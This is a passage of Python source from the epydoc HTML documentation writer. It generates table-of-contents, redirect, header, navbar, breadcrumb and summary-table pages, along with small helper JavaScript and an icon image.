file. 
if self._helpfile: if os.path.exists(self._helpfile): try: help = open(self._helpfile).read() except: raise IOError("Can't open help file: %r" % self._helpfile) else: raise IOError("Can't find help file: %r" % self._helpfile) else: if self._prj_name: thisprj = self._prj_name else: thisprj = 'this project' help = HTML_HELP % {'this_project':thisprj} # Insert the help contents into a webpage. self.write_header(out, 'Help') self.write_navbar(out, 'help') self.write_breadcrumbs(out, 'help', 'help.html') out(help) self.write_navbar(out, 'help') self.write_footer(out) #//////////////////////////////////////////////////////////// #{ 2.6. Frames-based Table of Contents #//////////////////////////////////////////////////////////// write_frames_index = compile_template( """ write_frames_index(self, out) Write the frames index file for the frames-based table of contents to the given streams. """, # /------------------------- Template -------------------------\ ''' <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "DTD/xhtml1-frameset.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> $self._prj_name or "API Documentation"$ </title> </head> <frameset cols="20%,80%"> <frameset rows="30%,70%"> <frame src="toc.html" name="moduleListFrame" id="moduleListFrame" /> <frame src="toc-everything.html" name="moduleFrame" id="moduleFrame" /> </frameset> <frame src="$self._top_page_url$" name="mainFrame" id="mainFrame" /> </frameset> </html> ''') # \------------------------------------------------------------/ write_toc = compile_template( """ write_toc(self, out) """, # /------------------------- Template -------------------------\ ''' >>> self.write_header(out, "Table of Contents") <h1 class="toc">Table&nbsp;of&nbsp;Contents</h1> <hr /> <a target="moduleFrame" href="toc-everything.html">Everything</a> <br /> >>> self.write_toc_section(out, "Modules", self.module_list) <hr /> >>> if 
self._show_private: $self.PRIVATE_LINK$ >>> #endif >>> self.write_footer(out, short=True) ''') # \------------------------------------------------------------/ def write_toc_section(self, out, name, docs, fullname=True): if not docs: return # Assign names to each item, and sort by name. if fullname: docs = [(str(d.canonical_name), d) for d in docs] else: docs = [(str(d.canonical_name[-1]), d) for d in docs] docs.sort() out(' <h2 class="toc">%s</h2>\n' % name) for label, doc in docs: doc_url = self.url(doc) toc_url = 'toc-%s' % doc_url is_private = self._doc_or_ancestor_is_private(doc) if is_private: if not self._show_private: continue out(' <div class="private">\n') if isinstance(doc, ModuleDoc): out(' <a target="moduleFrame" href="%s"\n' ' onclick="setFrame(\'%s\',\'%s\');"' ' >%s</a><br />' % (toc_url, toc_url, doc_url, label)) else: out(' <a target="mainFrame" href="%s"\n' ' >%s</a><br />' % (doc_url, label)) if is_private: out(' </div>\n') def write_project_toc(self, out): self.write_header(out, "Everything") out('<h1 class="toc">Everything</h1>\n') out('<hr />\n') # List the classes. self.write_toc_section(out, "All Classes", self.class_list) # List the functions. funcs = [d for d in self.routine_list if not isinstance(self.docindex.container(d), (ClassDoc, types.NoneType))] self.write_toc_section(out, "All Functions", funcs) # List the variables. vars = [] for doc in self.module_list: vars += doc.select_variables(value_type='other', imported=False, public=self._public_filter) self.write_toc_section(out, "All Variables", vars) # Footer material. out('<hr />\n') if self._show_private: out(self.PRIVATE_LINK+'\n') self.write_footer(out, short=True) def write_module_toc(self, out, doc): """ Write an HTML page containing the table of contents page for the given module to the given streams. This page lists the modules, classes, exceptions, functions, and variables defined by the module. 
""" name = doc.canonical_name[-1] self.write_header(out, name) out('<h1 class="toc">Module %s</h1>\n' % name) out('<hr />\n') # List the classes. classes = doc.select_variables(value_type='class', imported=False, public=self._public_filter) self.write_toc_section(out, "Classes", classes, fullname=False) # List the functions. funcs = doc.select_variables(value_type='function', imported=False, public=self._public_filter) self.write_toc_section(out, "Functions", funcs, fullname=False) # List the variables. variables = doc.select_variables(value_type='other', imported=False, public=self._public_filter) self.write_toc_section(out, "Variables", variables, fullname=False) # Footer material. out('<hr />\n') if self._show_private: out(self.PRIVATE_LINK+'\n') self.write_footer(out, short=True) #//////////////////////////////////////////////////////////// #{ 2.7. Project homepage (index.html) #//////////////////////////////////////////////////////////// def write_homepage(self, directory): """ Write an C{index.html} file in the given directory. The contents of this file are copied or linked from an existing page, so this method must be called after all pages have been written. The page used is determined by L{_frames_index} and L{_top_page}: - If L{_frames_index} is true, then C{frames.html} is copied. - Otherwise, the page specified by L{_top_page} is copied. """ filename = os.path.join(directory, 'index.html') if self._frames_index: top = 'frames.html' else: top = self._top_page_url # Copy the non-frames index file from top, if it's internal. if top[:5] != 'http:' and '/' not in top: try: # Read top into `s`. topfile = os.path.join(directory, top) s = open(topfile, 'r').read() # Write the output file. open(filename, 'w').write(s) return except: log.error('Warning: error copying index; ' 'using a redirect page') # Use a redirect if top is external, or if we faild to copy. 
name = self._prj_name or 'this project' f = open(filename, 'w') self.write_redirect_index(f.write, top, name) f.close() write_redirect_index = compile_template( """ write_redirect_index(self, out, top, name) """, # /------------------------- Template -------------------------\ ''' <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Redirect </title> <meta http-equiv="refresh" content="1;url=$top$" /> <link rel="stylesheet" href="epydoc.css" type="text/css"></link> </head> <body> <p>Redirecting to the API documentation for <a href="$top$">$self._prj_name or "this project"$</a>...</p> </body> </html> ''') # \------------------------------------------------------------/ #//////////////////////////////////////////////////////////// #{ 2.8. Stylesheet (epydoc.css) #//////////////////////////////////////////////////////////// def write_css(self, directory, cssname): """ Write the CSS stylesheet in the given directory. If C{cssname} contains a stylesheet file or name (from L{epydoc.docwriter.html_css}), then use that stylesheet; otherwise, use the default stylesheet. @rtype: C{None} """ filename = os.path.join(directory, 'epydoc.css') # Get the contents for the stylesheet file. if cssname is None: css = STYLESHEETS['default'][0] else: if os.path.exists(cssname): try: css = open(cssname).read() except: raise IOError("Can't open CSS file: %r" % cssname) elif cssname in STYLESHEETS: css = STYLESHEETS[cssname][0] else: raise IOError("Can't find CSS file: %r" % cssname) # Write the stylesheet. cssfile = open(filename, 'w') cssfile.write(css) cssfile.close() #//////////////////////////////////////////////////////////// #{ 2.9. 
    #  Javascript (epydoc.js)
    #////////////////////////////////////////////////////////////

    def write_javascript(self, directory):
        """
        Write the C{epydoc.js} support script into C{directory} by
        concatenating the javascript constants defined below (plus the
        source-colorizer scripts from L{html_colorize}).
        """
        jsfile = open(os.path.join(directory, 'epydoc.js'), 'w')
        print >> jsfile, self.TOGGLE_PRIVATE_JS
        print >> jsfile, self.SHOW_PRIVATE_JS
        print >> jsfile, self.GET_COOKIE_JS
        print >> jsfile, self.SET_FRAME_JS
        print >> jsfile, self.HIDE_PRIVATE_JS
        print >> jsfile, self.TOGGLE_CALLGRAPH_JS
        print >> jsfile, html_colorize.PYSRC_JAVASCRIPTS
        print >> jsfile, self.GET_ANCHOR_JS
        print >> jsfile, self.REDIRECT_URL_JS
        jsfile.close()

    #: A javascript that is used to show or hide the API documentation
    #: for private objects.  In order for this to work correctly, all
    #: documentation for private objects should be enclosed in
    #: C{<div class="private">...</div>} elements.
    TOGGLE_PRIVATE_JS = '''
      function toggle_private() {
        // Search for any private/public links on this page.  Store
        // their old text in "cmd," so we will know what action to
        // take; and change their text to the opposite action.
        var cmd = "?";
        var elts = document.getElementsByTagName("a");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "privatelink") {
            cmd = elts[i].innerHTML;
            elts[i].innerHTML = ((cmd && cmd.substr(0,4)=="show")?
                                 "hide&nbsp;private":"show&nbsp;private");
          }
        }
        // Update all DIVs containing private objects.
        var elts = document.getElementsByTagName("div");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "private") {
            elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":"block");
          } else if (elts[i].className == "public") {
            elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"block":"none");
          }
        }
        // Update all table rows containing private objects.  Note, we
        // use "" instead of "block" becaue IE & firefox disagree on what
        // this should be (block vs table-row), and "" just gives the
        // default for both browsers.
        var elts = document.getElementsByTagName("tr");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "private") {
            elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":"");
          }
        }
        // Update all list items containing private objects.
        var elts = document.getElementsByTagName("li");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "private") {
            elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?
                                     "none":"");
          }
        }
        // Update all list items containing private objects.
        var elts = document.getElementsByTagName("ul");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "private") {
            elts[i].style.display = ((cmd && cmd.substr(0,4)=="hide")?"none":"block");
          }
        }
        // Set a cookie to remember the current option.
        document.cookie = "EpydocPrivate="+cmd;
      }
    '''.strip()

    #: A javascript that is used to read the value of a cookie.  This
    #: is used to remember whether private variables should be shown or
    #: hidden.
    GET_COOKIE_JS = '''
      function getCookie(name) {
        var dc = document.cookie;
        var prefix = name + "=";
        var begin = dc.indexOf("; " + prefix);
        if (begin == -1) {
          begin = dc.indexOf(prefix);
          if (begin != 0) return null;
        } else {
          begin += 2;
        }
        var end = document.cookie.indexOf(";", begin);
        if (end == -1) {
          end = dc.length;
        }
        return unescape(dc.substring(begin + prefix.length, end));
      }
    '''.strip()

    #: A javascript that is used to set the contents of two frames at
    #: once.  This is used by the project table-of-contents frame to
    #: set both the module table-of-contents frame and the main frame
    #: when the user clicks on a module.
    SET_FRAME_JS = '''
      function setFrame(url1, url2) {
        parent.frames[1].location.href = url1;
        parent.frames[2].location.href = url2;
      }
    '''.strip()

    #: A javascript that is used to hide private variables, unless
    #: either: (a) the cookie says not to; or (b) we appear to be
    #: linking to a private variable.
    HIDE_PRIVATE_JS = '''
      function checkCookie() {
        var cmd=getCookie("EpydocPrivate");
        if (cmd && cmd.substr(0,4)!="show" && location.href.indexOf("#_") < 0)
            toggle_private();
      }
    '''.strip()

    #: Toggle the visibility of the <div> rendered for a call graph
    #: (see L{render_callgraph} / L{callgraph_link}).
    TOGGLE_CALLGRAPH_JS = '''
      function toggleCallGraph(id) {
        var elt = document.getElementById(id);
        if (elt.style.display == "none")
            elt.style.display = "block";
        else
            elt.style.display = "none";
      }
    '''.strip()

    #: Force private objects visible (used when a page is entered with
    #: a "hide" cookie but privates must be shown).
    SHOW_PRIVATE_JS = '''
      function show_private() {
        var elts = document.getElementsByTagName("a");
        for(var i=0; i<elts.length; i++) {
          if (elts[i].className == "privatelink") {
            cmd = elts[i].innerHTML;
            if (cmd && cmd.substr(0,4)=="show")
                toggle_private();
          }
        }
      }
    '''.strip()

    #: Return the fragment identifier of the current page URL, if any.
    GET_ANCHOR_JS = '''
      function get_anchor() {
        var href = location.href;
        var start = href.indexOf("#")+1;
        if ((start != 0) && (start != href.length))
            return href.substring(start, href.length);
      }
    '''.strip()

    #: A javascript that is used to implement the auto-redirect page.
    #: When the user visits <redirect.html#dotted.name>, they will
    #: automatically get redirected to the page for the object with
    #: the given fully-qualified dotted name.  E.g., for epydoc,
    #: <redirect.html#epydoc.apidoc.UNKNOWN> redirects the user to
    #: <epydoc.apidoc-module.html#UNKNOWN>.
    REDIRECT_URL_JS = '''
      function redirect_url(dottedName) {
        // Scan through each element of the "pages" list, and check
        // if "name" matches with any of them.
        for (var i=0; i<pages.length; i++) {

            // Each page has the form "<pagename>-m" or "<pagename>-c";
            // extract the <pagename> portion & compare it to dottedName.
            var pagename = pages[i].substring(0, pages[i].length-2);
            if (pagename == dottedName.substring(0,pagename.length)) {

                // We\'ve found a page that matches `dottedName`;
                // construct its URL, using leftover `dottedName`
                // content to form an anchor.
                var pagetype = pages[i].charAt(pages[i].length-1);
                var url = pagename + ((pagetype=="m")?"-module.html":
                                                      "-class.html");
                if (dottedName.length > pagename.length)
                    url += "#" + dottedName.substring(pagename.length+1,
                                                      dottedName.length);
                return url;
            }
        }
      }
    '''.strip()

    #////////////////////////////////////////////////////////////
    #{ 2.10. Graphs
    #////////////////////////////////////////////////////////////

    def render_graph(self, graph):
        """
        Render C{graph} to a GIF next to the output pages and return
        the HTML chunk that embeds it; '' if C{graph} is None.
        """
        if graph is None: return ''
        graph.caption = graph.title = None
        image_url = '%s.gif' % graph.uid
        image_file = os.path.join(self._directory, image_url)
        return graph.to_html(image_file, image_url)

    # Matches the quoted "<uid>-div" id embedded in rendered callgraph HTML.
    RE_CALLGRAPH_ID = re.compile(r"""["'](.+-div)['"]""")

    def render_callgraph(self, callgraph, token=""):
        """Render the HTML chunk of a callgraph.

        If C{callgraph} is a string, use the L{_callgraph_cache} to
        return a pre-rendered HTML chunk.  This mostly avoids to run
        C{dot} twice for the same callgraph.  Else, run the graph and
        store its HTML output in the cache.

        @param callgraph: The graph to render or its L{uid<DotGraph.uid>}.
        @type callgraph: L{DotGraph} or C{str}
        @param token: A string that can be used to make the C{<div>} id
            unambiguous, if the callgraph is used more than once in a
            page.
        @type token: C{str}
        @return: The HTML representation of the graph.
        @rtype: C{str}
        """
        if callgraph is None: return ""

        if isinstance(callgraph, basestring):
            uid = callgraph
            rv = self._callgraph_cache.get(callgraph, "")

        else:
            uid = callgraph.uid
            graph_html = self.render_graph(callgraph)
            if graph_html == '':
                rv = ""
            else:
                # `%%s-div` survives the first % as the literal `%s-div`
                # placeholder; it is filled with uid+token below.
                rv = ('<div style="display:none" id="%%s-div"><center>\n'
                      '<table border="0" cellpadding="0" cellspacing="0">\n'
                      ' <tr><td>%s</td></tr>\n'
                      ' <tr><th>Call Graph</th></tr>\n'
                      '</table><br />\n</center></div>\n' % graph_html)

            # Store in the cache the complete HTML chunk without the
            # div id, which may be made unambiguous by the token
            self._callgraph_cache[uid] = rv

        # Mangle with the graph
        if rv: rv = rv % (uid + token)

        return rv

    def callgraph_link(self, callgraph, token=""):
        """Render the HTML chunk of a callgraph link.

        The link can toggles the visibility of the callgraph rendered
        using L{render_callgraph} with matching parameters.

        @param callgraph: The graph to render or its L{uid<DotGraph.uid>}.
        @type callgraph: L{DotGraph} or C{str}
        @param token: A string that can be used to make the C{<div>} id
            unambiguous, if the callgraph is used more than once in a
            page.
        @type token: C{str}
        @return: The HTML representation of the graph link.
        @rtype: C{str}
        """
        # Use class=codelink, to match style w/ the source code link.
        if callgraph is None: return ''

        if isinstance(callgraph, basestring):
            uid = callgraph
        else:
            uid = callgraph.uid

        return ('<br /><span class="codelink"><a href="javascript:void(0);" '
                'onclick="toggleCallGraph(\'%s-div\');return false;">'
                'call&nbsp;graph</a></span>&nbsp;' % (uid + token))

    #////////////////////////////////////////////////////////////
    #{ 2.11. Images
    #////////////////////////////////////////////////////////////

    # Base64-encoded PNG data, written verbatim by write_images().
    IMAGES = {'crarr.png': # Carriage-return arrow, used for LINEWRAP.
              'iVBORw0KGgoAAAANSUhEUgAAABEAAAAKCAMAAABlokWQAAAALHRFWHRD'
              'cmVhdGlvbiBUaW1lAFR1\nZSAyMiBBdWcgMjAwNiAwMDo0MzoxMCAtMD'
              'UwMGAMEFgAAAAHdElNRQfWCBYFASkQ033WAAAACXBI\nWXMAAB7CAAAe'
              'wgFu0HU+AAAABGdBTUEAALGPC/xhBQAAAEVQTFRF////zcOw18/AgGY0'
              'c1cg4dvQ\ninJEYEAAYkME3NXI6eTcloFYe2Asr5+AbE4Uh29A9fPwqp'
              'l4ZEUI8O3onopk0Ma0lH5U1nfFdgAA\nAAF0Uk5TAEDm2GYAAABNSURB'
              'VHjaY2BAAbzsvDAmK5oIlxgfioiwCAe7KJKIgKAQOzsLLwTwA0VY\n+d'
              'iRAT8T0AxuIIMHqoaXCWIPGzsHJ6orGJiYWRjQASOcBQAocgMSPKMTIg'
              'AAAABJRU5ErkJggg==\n',
              }

    def write_images(self, directory):
        """Decode and write every entry of L{IMAGES} into C{directory}."""
        for (name, data) in self.IMAGES.items():
            f = open(os.path.join(directory, name), 'wb')
            f.write(base64.decodestring(data))
            f.close()

    #////////////////////////////////////////////////////////////
    #{ 3.1. Page Header
    #////////////////////////////////////////////////////////////

    write_header = compile_template(
        """
        write_header(self, out, title)

        Generate HTML code for the standard page header, and write it
        to C{out}.  C{title} is a string containing the page title.
        It should be appropriately escaped/encoded.
        """,
        # /------------------------- Template -------------------------\
        '''
        <?xml version="1.0" encoding="ascii"?>
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
                  "DTD/xhtml1-transitional.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
        <head>
          <title>$title$</title>
          <link rel="stylesheet" href="epydoc.css" type="text/css" />
          <script type="text/javascript" src="epydoc.js"></script>
        </head>

        <body bgcolor="white" text="black" link="blue" vlink="#204080"
              alink="#204080">
        ''')
        # \------------------------------------------------------------/

    #////////////////////////////////////////////////////////////
    #{ 3.2. Page Footer
    #////////////////////////////////////////////////////////////

    write_footer = compile_template(
        """
        write_footer(self, out, short=False)

        Generate HTML code for the standard page footer, and write it
        to C{out}.
        """,
        # /------------------------- Template -------------------------\
        '''
        >>> if not short:
        <table border="0" cellpadding="0" cellspacing="0" width="100%%">
          <tr>
            <td align="left" class="footer">
        >>> if self._include_log:
            <a href="epydoc-log.html">Generated by Epydoc
            $epydoc.__version__$ on $time.asctime()$</a>
        >>> else:
            Generated by Epydoc $epydoc.__version__$ on $time.asctime()$
        >>> #endif
            </td>
            <td align="right" class="footer">
              <a target="mainFrame" href="http://epydoc.sourceforge.net"
                >http://epydoc.sourceforge.net</a>
            </td>
          </tr>
        </table>
        >>> #endif

        <script type="text/javascript">
          <!--
          // Private objects are initially displayed (because if
          // javascript is turned off then we want them to be
          // visible); but by default, we want to hide them.  So hide
          // them unless we have a cookie that says to show them.
          checkCookie();
          // -->
        </script>
        </body>
        </html>
        ''')
        # \------------------------------------------------------------/

    #////////////////////////////////////////////////////////////
    #{ 3.3. Navigation Bar
    #////////////////////////////////////////////////////////////

    write_navbar = compile_template(
        """
        write_navbar(self, out, context)

        Generate HTML code for the navigation bar, and write it to
        C{out}.  The navigation bar typically looks like::

            [ Home Trees Index Help             Project ]

        @param context: A value indicating what page we're generating
            a navigation bar for.  If we're generating an API
            documentation page for an object, then C{context} is a
            L{ValueDoc} containing the documentation for that object;
            otherwise, C{context} is a string name for the page.  The
            following string names are recognized: C{'tree'},
            C{'index'}, and C{'help'}.
        """,
        # /------------------------- Template -------------------------\
        '''
        <!-- ==================== NAVIGATION BAR ==================== -->
        <table class="navbar" border="0" width="100%"
               cellpadding="0" bgcolor="#a0c0ff" cellspacing="0">
          <tr valign="middle">
        >>> if self._top_page_url not in (self._trees_url, "identifier-index.html", "help.html"):
          <!-- Home link -->
        >>> if (isinstance(context, ValueDoc) and
        >>>     self._top_page_url == self.url(context.canonical_name)):
              <th bgcolor="#70b0f0" class="navbar-select"
                  >&nbsp;&nbsp;&nbsp;Home&nbsp;&nbsp;&nbsp;</th>
        >>> else:
              <th>&nbsp;&nbsp;&nbsp;<a href="$self._top_page_url$">Home</a>&nbsp;&nbsp;&nbsp;</th>
        >>> #endif

          <!-- Tree link -->
        >>> if context == "trees":
              <th bgcolor="#70b0f0" class="navbar-select"
                  >&nbsp;&nbsp;&nbsp;Trees&nbsp;&nbsp;&nbsp;</th>
        >>> else:
              <th>&nbsp;&nbsp;&nbsp;<a href="$self._trees_url$">Trees</a>&nbsp;&nbsp;&nbsp;</th>
        >>> #endif

          <!-- Index link -->
        >>> if context == "indices":
              <th bgcolor="#70b0f0" class="navbar-select"
                  >&nbsp;&nbsp;&nbsp;Indices&nbsp;&nbsp;&nbsp;</th>
        >>> else:
              <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th>
        >>> #endif

          <!-- Help link -->
        >>> if context == "help":
              <th bgcolor="#70b0f0" class="navbar-select"
                  >&nbsp;&nbsp;&nbsp;Help&nbsp;&nbsp;&nbsp;</th>
        >>> else:
              <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th>
        >>> #endif

        >>> if self._prj_link:
          <!-- Project homepage -->
              <th class="navbar" align="right" width="100%">
                <table border="0" cellpadding="0" cellspacing="0">
                  <tr><th class="navbar" align="center"
                    >$self._prj_link.strip()$</th>
                  </tr></table></th>
        >>> else:
              <th class="navbar" width="100%"></th>
        >>> #endif
          </tr>
        </table>
        ''')
        # \------------------------------------------------------------/

    #////////////////////////////////////////////////////////////
    #{ 3.4.
    #  Breadcrumbs
    #////////////////////////////////////////////////////////////

    write_breadcrumbs = compile_template(
        """
        write_breadcrumbs(self, out, context, context_url)

        Generate HTML for the breadcrumbs line, and write it to
        C{out}.  The breadcrumbs line is an invisible table with a
        list of pointers to the current object's ancestors on the
        left; and the show/hide private selector and the
        frames/noframes selector on the right.

        @param context: The API documentation for the object whose
            breadcrumbs we should generate.
        @type context: L{ValueDoc}
        """,
        # /------------------------- Template -------------------------\
        '''
        <table width="100%" cellpadding="0" cellspacing="0">
          <tr valign="top">
        >>> if isinstance(context, APIDoc):
            <td width="100%">
              <span class="breadcrumbs">
        >>> crumbs = self.breadcrumbs(context)
        >>> for crumb in crumbs[:-1]:
                $crumb$ ::
        >>> #endfor
                $crumbs[-1]$
              </span>
            </td>
        >>> else:
            <td width="100%">&nbsp;</td>
        >>> #endif
            <td>
              <table cellpadding="0" cellspacing="0">
                <!-- hide/show private -->
        >>> if self._show_private:
                <tr><td align="right">$self.PRIVATE_LINK$</td></tr>
        >>> #endif
        >>> if self._frames_index:
                <tr><td align="right"><span class="options"
                    >[<a href="frames.html" target="_top">frames</a
                    >]&nbsp;|&nbsp;<a href="$context_url$"
                    target="_top">no&nbsp;frames</a>]</span></td></tr>
        >>> #endif
              </table>
            </td>
          </tr>
        </table>
        ''')
        # \------------------------------------------------------------/

    def breadcrumbs(self, doc):
        """
        Return a list of HTML breadcrumb labels for C{doc}: one crumb
        per ancestor container, ending with C{doc}'s own crumb.
        """
        crumbs = [self._crumb(doc)]

        # Generate the crumbs for uid's ancestors.
        while True:
            container = self.docindex.container(doc)
            assert doc != container, 'object is its own container?'
            if container is None:
                if doc.canonical_name is UNKNOWN:
                    return ['??']+crumbs
                elif isinstance(doc, ModuleDoc):
                    return ['Package&nbsp;%s' % ident for ident
                            in doc.canonical_name[:-1]]+crumbs
                else:
                    return list(doc.canonical_name)+crumbs
            else:
                label = self._crumb(container)
                # NOTE(review): `name` is assigned but never used.
                name = container.canonical_name
                crumbs.insert(0, self.href(container, label)) # [xx] code=0??
                doc = container

    def _crumb(self, doc):
        # Scripts get a "Script <name>" crumb; everything else is
        # "<kind> <last-name-component>".
        if (len(doc.canonical_name)==1 and
            doc.canonical_name[0].startswith('script-')):
            return 'Script&nbsp;%s' % doc.canonical_name[0][7:]
        return '%s&nbsp;%s' % (self.doc_kind(doc), doc.canonical_name[-1])

    #////////////////////////////////////////////////////////////
    #{ 3.5. Summary Tables
    #////////////////////////////////////////////////////////////

    def write_summary_table(self, out, heading, doc, value_type):
        """
        Generate HTML code for a summary table, and write it to
        C{out}.  A summary table is a table that includes a one-row
        description for each variable (of a given type) in a module
        or class.

        @param heading: The heading for the summary table; typically,
            this indicates what kind of value the table describes
            (e.g., functions or classes).
        @param doc: A L{ValueDoc} object containing the API
            documentation for the module or class whose variables we
            should summarize.
        @param value_type: A string indicating what type of value
            should be listed in this summary table.  This value is
            passed on to C{doc}'s C{select_variables()} method.
        """
        # inh_var_groups is a dictionary used to hold "inheritance
        # pseudo-groups", which are created when inheritance is
        # 'grouped'.  It maps each base to a list of vars inherited
        # from that base.
        grouped_inh_vars = {}

        # Divide all public variables of the given type into groups.
        groups = [(plaintext_to_html(group_name),
                   doc.select_variables(group=group_name, imported=False,
                                        value_type=value_type,
                                        public=self._public_filter))
                  for group_name in doc.group_names()]

        # Discard any empty groups; and return if they're all empty.
        groups = [(g,vars) for (g,vars) in groups if vars]
        if not groups: return

        # Write a header
        self.write_table_header(out, "summary", heading)

        # Write a section for each group.
        for name, var_docs in groups:
            self.write_summary_group(out, doc, name,
                                     var_docs, grouped_inh_vars)

        # Write a section for each inheritance pseudo-group (used if
        # inheritance=='grouped')
        if grouped_inh_vars:
            for base in doc.mro():
                if base in grouped_inh_vars:
                    hdr = 'Inherited from %s' % self.href(base, context=doc)
                    tr_class = ''
                    if len([v for v in grouped_inh_vars[base]
                            if v.is_public]) == 0:
                        tr_class = ' class="private"'
                    self.write_group_header(out, hdr, tr_class)
                    for var_doc in grouped_inh_vars[base]:
                        self.write_summary_line(out, var_doc, doc)

        # Write a footer for the table.
        out(self.TABLE_FOOTER)

    def write_summary_group(self, out, doc, name, var_docs, grouped_inh_vars):
        """
        Write one named group of the summary table; inherited vars are
        routed either to an inline list (C{listed_inh_vars}) or into
        the caller's C{grouped_inh_vars} dict, depending on
        C{self._inheritance}.
        """
        # Split up the var_docs list, according to the way each var
        # should be displayed:
        #   - listed_inh_vars -- for listed inherited variables.
        #   - grouped_inh_vars -- for grouped inherited variables.
        #   - normal_vars -- for all other variables.
        listed_inh_vars = {}
        normal_vars = []
        for var_doc in var_docs:
            if var_doc.container != doc:
                base = var_doc.container
                if not isinstance(base, ClassDoc):
                    # This *should* never happen:
                    log.warning("%s's container is not a class!" % var_doc)
                    normal_vars.append(var_doc)
                elif (base not in self.class_set or
                      self._inheritance == 'listed'):
                    listed_inh_vars.setdefault(base,[]).append(var_doc)
                elif self._inheritance == 'grouped':
                    grouped_inh_vars.setdefault(base,[]).append(var_doc)
                else:
                    normal_vars.append(var_doc)
            else:
                normal_vars.append(var_doc)

        # Write a header for the group.
        if name != '':
            tr_class = ''
            if len([v for v in var_docs if v.is_public]) == 0:
                tr_class = ' class="private"'
            self.write_group_header(out, name, tr_class)

        # Write a line for each normal var:
        for var_doc in normal_vars:
            self.write_summary_line(out, var_doc, doc)
        # Write a subsection for inherited vars:
        if listed_inh_vars:
            self.write_inheritance_list(out, doc, listed_inh_vars)

    def write_inheritance_list(self, out, doc, listed_inh_vars):
        """Write the "Inherited from <base>: ..." summary rows."""
        out('  <tr>\n    <td colspan="2" class="summary">\n')
        for base in doc.mro():
            if base not in listed_inh_vars: continue
            public_vars = [v for v in listed_inh_vars[base]
                           if v.is_public]
            private_vars = [v for v in listed_inh_vars[base]
                            if not v.is_public]
            if public_vars:
                out('    <p class="indent-wrapped-lines">'
                    '<b>Inherited from <code>%s</code></b>:\n' %
                    self.href(base, context=doc))
                self.write_var_list(out, public_vars)
                out('      </p>\n')
            if private_vars and self._show_private:
                out('    <div class="private">')
                out('    <p class="indent-wrapped-lines">'
                    '<b>Inherited from <code>%s</code></b> (private):\n' %
                    self.href(base, context=doc))
                self.write_var_list(out, private_vars)
                out('      </p></div>\n')
        out('    </td>\n  </tr>\n')

    def write_var_list(self, out, vardocs):
        """Write a comma-separated list of links for C{vardocs}."""
        out('      ')
        out(',\n      '.join(['<code>%s</code>' % self.href(v,v.name)
                              for v in vardocs])+'\n')

    def write_summary_line(self, out, var_doc, container):
        """
        Generate HTML code for a single line of a summary table, and
        write it to C{out}.  See L{write_summary_table} for more
        information.

        @param var_doc: The API documentation for the variable that
            should be described by this line of the summary table.
        @param container: The API documentation for the class or
            module whose summary table we're writing.
        """
        pysrc_link = None
        callgraph = None

        # If it's a private variable, then mark its <tr>.
        if var_doc.is_public: tr_class = ''
        else: tr_class = ' class="private"'

        # Decide an anchor or a link is to be generated.
        link_name = self._redundant_details or var_doc.is_detailed()
        anchor = not link_name

        # Construct the HTML code for the type (cell 1) & description
        # (cell 2).
        if isinstance(var_doc.value, RoutineDoc):
            typ = self.return_type(var_doc, indent=6)
            description = self.function_signature(var_doc, is_summary=True,
                                                  link_name=link_name,
                                                  anchor=anchor)
            pysrc_link = self.pysrc_link(var_doc.value)

            # Perpare the call-graph, if requested
            if 'callgraph' in self._graph_types:
                linker = _HTMLDocstringLinker(self, var_doc.value)
                callgraph = call_graph([var_doc.value], self.docindex,
                                       linker, var_doc, add_callers=True,
                                       add_callees=True)
                if callgraph and callgraph.nodes:
                    var_doc.value.callgraph_uid = callgraph.uid
                else:
                    callgraph = None
        else:
            typ = self.type_descr(var_doc, indent=6)
            description = self.summary_name(var_doc, link_name=link_name,
                                            anchor=anchor)
            if isinstance(var_doc.value, GenericValueDoc):
                # The summary max length has been chosen setting
                # L{ValueDoc.SUMMARY_REPR_LINELEN} in the constructor
                max_len=self._variable_summary_linelen-3-len(var_doc.name)
                val_repr = var_doc.value.summary_pyval_repr(max_len)
                tooltip = self.variable_tooltip(var_doc)
                description += (' = <code%s>%s</code>' %
                                (tooltip, val_repr.to_html(None)))

        # Add the summary to the description (if there is one).
        summary = self.summary(var_doc, indent=6)
        if summary: description += '<br />\n %s' % summary

        # If it's inherited, then add a note to the description.
        if var_doc.container != container and self._inheritance=="included":
            description += ("\n <em>(Inherited from " +
                            self.href(var_doc.container) + ")</em>")

        # Write the summary line.
        self._write_summary_line(out, typ, description, tr_class,
                                 pysrc_link, callgraph)

    _write_summary_line = compile_template(
        "_write_summary_line(self, out, typ, description, tr_class, "
        "pysrc_link, callgraph)",
        # /------------------------- Template -------------------------\
        '''
        <tr$tr_class$>
            <td width="15%" align="right" valign="top" class="summary">
              <span class="summary-type">$typ or "&nbsp;"$</span>
            </td><td class="summary">
        >>> if pysrc_link is not None or callgraph is not None:
              <table width="100%" cellpadding="0" cellspacing="0" border="0">
                <tr>
                  <td>$description$</td>
                  <td align="right" valign="top">
                    $pysrc_link$
                    $self.callgraph_link(callgraph, token='-summary')$
                  </td>
                </tr>
              </table>
              $self.render_callgraph(callgraph, token='-summary')$
        >>> #endif
        >>> if pysrc_link is None and callgraph is None:
              $description$
        >>> #endif
            </td>
          </tr>
        ''')
        # \------------------------------------------------------------/

    #////////////////////////////////////////////////////////////
